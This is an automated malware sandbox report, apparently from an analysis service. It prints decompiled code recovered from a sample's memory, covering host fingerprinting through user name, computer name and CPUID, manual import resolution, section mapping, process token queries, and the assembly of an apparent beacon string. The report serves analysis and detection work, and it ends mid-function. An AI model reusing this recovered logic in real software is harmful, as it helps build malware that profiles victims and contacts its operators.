WaitForSingleObject.KERNEL32(00000000,000000FF,6ECE10B9,?,00000000), ref: 6ECE16CD
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 6ECE16DF
CloseHandle.KERNEL32(00000000), ref: 6ECE16E6
GetLastError.KERNEL32(6ECE10B9,?,00000000), ref: 6ECE16EE
GetLastError.KERNEL32 ref: 6ECE16FB

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
String ID:
API String ID: 3479304935-0
Opcode ID: 93b89d08dd6843147865106ed08640d83c847993b7ee5a31cf50e1c9a2941d00
Instruction ID: 29c25e45da027c2eb33dc5fd8d2776a326c5653aadba3824b14af135a7c3c215
Opcode Fuzzy Hash: 93b89d08dd6843147865106ed08640d83c847993b7ee5a31cf50e1c9a2941d00
Instruction Fuzzy Hash: FE31E071D11619ABDB50DFED8D44AEE7BBCEF46364F140522E410D3648FB30DA588BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE1172, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6ECE1172(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6ECE2160();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6ece41c4;
				_push(_t15 + 0x6ece505e);
				_push(_t15 + 0x6ece5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6ECE215A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6ece41c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6ece1172
0x6ece117b
0x6ece117f
0x6ece1185
0x6ece118a
0x6ece118f
0x6ece1192
0x6ece1195
0x6ece119a
0x6ece119b
0x6ece119e
0x6ece11a9
0x6ece11b0
0x6ece11b4
0x6ece11b6
0x6ece11b7
0x6ece11ba
0x6ece11bf
0x6ece11c9
0x6ece11cb
0x6ece11cb
0x6ece11df
0x6ece11e5
0x6ece11e9
0x6ece1239
0x6ece11eb
0x6ece11f4
0x6ece120a
0x6ece1212
0x6ece1224
0x6ece1228
0x00000000
0x00000000
0x6ece1214
0x6ece1217
0x6ece121c
0x6ece121e
0x6ece121e
0x6ece11ff
0x6ece1201
0x6ece122a
0x6ece122b
0x6ece122b
0x6ece11f4
0x6ece1241

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6ECE1132,0000000A,?,?), ref: 6ECE117F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6ECE1195
_snwprintf.NTDLL ref: 6ECE11BA
CreateFileMappingW.KERNELBASE(000000FF,6ECE41C8,00000004,00000000,?,?), ref: 6ECE11DF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6ECE1132,0000000A,?), ref: 6ECE11F6
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6ECE120A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6ECE1132,0000000A,?), ref: 6ECE1222
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6ECE1132,0000000A), ref: 6ECE122B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6ECE1132,0000000A,?), ref: 6ECE1233

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: ab7aa069787d72c28b9f73ec4214377ee7b551818d2e3178e653393b61a5d754
Instruction ID: e67908a43a05937ace4416a6c9599b9ae2bb40b0e81f6474446fd9b8316cfcad
Opcode Fuzzy Hash: ab7aa069787d72c28b9f73ec4214377ee7b551818d2e3178e653393b61a5d754
Instruction Fuzzy Hash: 4321ACB2A00109AFDB04AFECCC88EAE77BCFB49355F114125F625E7190E670AD598B60

Uniqueness

Uniqueness Score: -1.00%

Function 0075A82B, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0075A82B(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x75d2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E007560B6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x75d2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x75d270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E0075789B(_v8 + _v8, _t64);
							}
							HeapFree( *0x75d270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x75d270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0075789B(_v8 + _v8, _t64);
						}
						HeapFree( *0x75d270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x0075a82b
0x0075a833
0x0075a837
0x0075a83a
0x0075a83f
0x0075a841
0x0075a846
0x0075a846
0x0075a84c
0x0075a84e
0x0075a85b
0x0075a8bc
0x0075a85d
0x0075a862
0x0075a868
0x0075a86d
0x0075a87b
0x0075a87f
0x0075a88e
0x0075a895
0x0075a89c
0x0075a89c
0x0075a8a7
0x0075a8a7
0x0075a87f
0x0075a86d
0x0075a8be
0x0075a8c4
0x0075a8ce
0x0075a8d0
0x0075a8d5
0x0075a8e4
0x0075a8e8
0x0075a8f3
0x0075a8fa
0x0075a901
0x0075a901
0x0075a90d
0x0075a90d
0x0075a8e8
0x0075a918
0x0075a91a
0x0075a91d
0x0075a91f
0x0075a922
0x0075a925
0x0075a92f
0x0075a933
0x0075a937

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 0075A862
RtlAllocateHeap.NTDLL(00000000,?), ref: 0075A879
GetUserNameW.ADVAPI32(00000000,?), ref: 0075A886
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0075538B), ref: 0075A8A7
GetComputerNameW.KERNEL32(00000000,00000000), ref: 0075A8CE
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0075A8E2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 0075A8EF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0075538B), ref: 0075A90D

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 6a5ff215fbb7eeebdf254bd81b7a7c369e65d1ed2b033765ff0e290c2e8837a8
Instruction ID: 2ed22669b6c75c7d45ab50af2d463b2468d53b23bec0eeda5e51083c371c06bf
Opcode Fuzzy Hash: 6a5ff215fbb7eeebdf254bd81b7a7c369e65d1ed2b033765ff0e290c2e8837a8
Instruction Fuzzy Hash: DC313A71A00309EFDB21DFA5DC81AAEB7F9FB44302F118129E805D3250EBB8EE459B55

Uniqueness

Uniqueness Score: -1.00%

Function 00755D10, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00755D10(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E007575F6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00754AAB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00755d1d
0x00755d1e
0x00755d1f
0x00755d20
0x00755d21
0x00755d25
0x00755d2c
0x00755d3b
0x00755d3e
0x00755d41
0x00755d48
0x00755d4b
0x00755d4e
0x00755d51
0x00755d54
0x00755d5f
0x00755d61
0x00755d6a
0x00755d72
0x00755d74
0x00755d86
0x00755d90
0x00755d94
0x00755da3
0x00755da7
0x00755db0
0x00755db8
0x00755db8
0x00755dba
0x00755dba
0x00755dc2
0x00755dc8
0x00755dcc
0x00755dcc
0x00755dd7

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00755D57
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00755D6A
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00755D86

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00755DA3
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00755DB0
NtClose.NTDLL(?), ref: 00755DC2
NtClose.NTDLL(00000000), ref: 00755DCC

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 09f6fab660570da6e890b8839983f48af82bd3cf13d5cf6653297ab1969b7502
Instruction ID: 45cfcbaee9dab2afd36e21425deb567cd7fd754df4288364c49b4153ffa415e7
Opcode Fuzzy Hash: 09f6fab660570da6e890b8839983f48af82bd3cf13d5cf6653297ab1969b7502
Instruction Fuzzy Hash: D22107B6A0021CFFDB019FA5CC89EDEBFBDEB08751F108016F901E6121D7B59A449BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECF5600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6ECF5696
GetModuleFileNameW.KERNEL32(00000000,6ED8B7A0,000008BB), ref: 6ECF576F

Part of subcall function 6ECF72B0: task.LIBCPMTD ref: 6ECF7352

Part of subcall function 6ECFBA20: swap.LIBCPMTD ref: 6ECFBA39

CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6ED77144,?,?,?,?,?,00000000), ref: 6ECF5950
std::locale::locale.LIBCPMTD ref: 6ECF59D8

Strings

?, xrefs: 6ECF5627

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
String ID: ?
API String ID: 756721536-1684325040
Opcode ID: 6bc26e4d1d94e258ddde5f0e8b46496c836a6b5dece99b89d2518c62ae030005
Instruction ID: 23e79dafa879c571c827a27a51892c76f7949ff74f8a5e1289b6dddae076293f
Opcode Fuzzy Hash: 6bc26e4d1d94e258ddde5f0e8b46496c836a6b5dece99b89d2518c62ae030005
Instruction Fuzzy Hash: 965230B1920514CFEB88CFA9D590AAE77F6FB4B304F108129D615AB3DCE738584ADB44

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE13B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6ECE13B8(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6ECE1273(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6ece13c1
0x6ece13c8
0x6ece13c9
0x6ece13ca
0x6ece13cb
0x6ece13cc
0x6ece13dd
0x6ece13e1
0x6ece13f5
0x6ece13f8
0x6ece13fb
0x6ece1402
0x6ece1405
0x6ece140c
0x6ece140f
0x6ece1412
0x6ece1415
0x6ece141a
0x6ece1455
0x6ece141c
0x6ece141f
0x6ece1425
0x6ece142a
0x6ece142e
0x6ece144c
0x6ece1430
0x6ece1437
0x6ece1445
0x6ece1445
0x6ece142e
0x6ece145d

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 6ECE1415

Part of subcall function 6ECE1273: NtMapViewOfSection.NTDLL(00000000,000000FF,6ECE142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6ECE142A,?), ref: 6ECE12A0

memset.NTDLL ref: 6ECE1437

Strings

@, xrefs: 6ECE1405

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
Instruction ID: 766773a27d16958cb8af15bf2ba598d78a476c4d2fab4b02863456f744c9cd7b
Opcode Fuzzy Hash: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
Instruction Fuzzy Hash: BF211FB5D00209AFDB11CFE9C8849DEFBB9FF48354F108529E655F3610E7309A588BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE1DE5, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECE1DE5(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6ece41c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6ece1de5
0x6ece1dee
0x6ece1df3
0x6ece1df9
0x6ece1e02
0x6ece1e08
0x6ece1e0a
0x6ece1e0d
0x6ece1e12
0x6ece1e19
0x6ece1e19
0x6ece1e1d
0x6ece1e23
0x6ece1e28
0x00000000
0x00000000
0x6ece1e2e
0x6ece1e38
0x6ece1e3a
0x6ece1e3d
0x6ece1e40
0x6ece1e44
0x6ece1e4c
0x6ece1e4e
0x6ece1e51
0x6ece1eb9
0x6ece1eb9
0x6ece1ebd
0x00000000
0x00000000
0x6ece1e56
0x6ece1e5c
0x6ece1e5e
0x6ece1e71
0x6ece1e74
0x6ece1e74
0x6ece1e74
0x6ece1e78
0x6ece1e60
0x6ece1e60
0x6ece1e68
0x6ece1e6a
0x00000000
0x00000000
0x00000000
0x00000000
0x6ece1e6a
0x6ece1e58
0x6ece1e58
0x6ece1e6c
0x6ece1e6c
0x6ece1e6c
0x6ece1e7b
0x6ece1e7e
0x6ece1e80
0x6ece1e87
0x6ece1e82
0x6ece1e82
0x6ece1e82
0x6ece1e8f
0x6ece1e95
0x6ece1e97
0x6ece1ec7
0x6ece1e99
0x6ece1e99
0x6ece1e9c
0x6ece1e9e
0x6ece1ea6
0x6ece1ea6
0x6ece1eab
0x6ece1ead
0x6ece1eb4
0x6ece1eb6
0x6ece1eb6
0x6ece1eb6
0x00000000
0x6ece1eb6
0x00000000
0x6ece1e97
0x6ece1e46
0x6ece1e46
0x6ece1e4a
0x00000000
0x00000000
0x6ece1e4a
0x6ece1eca
0x6ece1eca
0x6ece1ed1
0x6ece1ed6
0x00000000
0x00000000
0x6ece1edc
0x6ece1ee7
0x00000000
0x6ece1ee7
0x6ece1ede
0x6ece1ede
0x6ece1ee4
0x00000000
0x6ece1ee4
0x6ece1e12
0x6ece1ee8
0x6ece1eed

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6ECE1E1D
GetProcAddress.KERNEL32(?,00000000), ref: 6ECE1E8F

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 00292c406d37b503a25d754a939a782a22c4a903a5e07cea54288f424633a68c
Instruction ID: 75cec8b5ea4a209b8631dfe157f2b8887fbb136ff85c5adaeca95f0589e51ab5
Opcode Fuzzy Hash: 00292c406d37b503a25d754a939a782a22c4a903a5e07cea54288f424633a68c
Instruction Fuzzy Hash: E0313875A00206DFDB54CF9EC898AAEB7F8FF05310B104069E811EB654F730EA59CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE1273, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6ECE1273(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6ece1285
0x6ece128b
0x6ece1299
0x6ece12a0
0x6ece12a5
0x6ece12ab
0x00000000
0x6ece12ac
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,6ECE142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6ECE142A,?), ref: 6ECE12A0

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 6f1f6fda6435425e035c30977bc860b31bfba95a9c164852427c75c23d2cc857
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: F7F012B590020CBFEB119FA9CC85C9FBBFDEB44394B104A39B152E1490D6319E588A60

Uniqueness

Uniqueness Score: -1.00%

Function 007544A4, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E007544A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x75d018; // 0x1f7541c4
				asm("bswap eax");
				_t27 =  *0x75d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 = E0075D010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x75d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0x75d2e0; // 0x25ca5a8
				_t3 = _t30 + 0x75e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x75d02c,  *0x75d004, _t25);
				_t33 = E00755B60();
				_t34 =  *0x75d2e0; // 0x25ca5a8
				_t4 = _t34 + 0x75e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E00751BBF(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x75d2e0; // 0x25ca5a8
					_t6 = _t83 + 0x75e8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x75d270, 0, _t96);
				}
				_t97 = E0075137A();
				if(_t97 != 0) {
					_t78 =  *0x75d2e0; // 0x25ca5a8
					_t8 = _t78 + 0x75e8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x75d270, 0, _t97);
				}
				_t98 =  *0x75d364; // 0x2d295b0
				_a32 = E00753857(0x75d00a, _t98 + 4);
				_t42 =  *0x75d308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x75d2e0; // 0x25ca5a8
					_t11 = _t74 + 0x75e8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x75d304; // 0x0
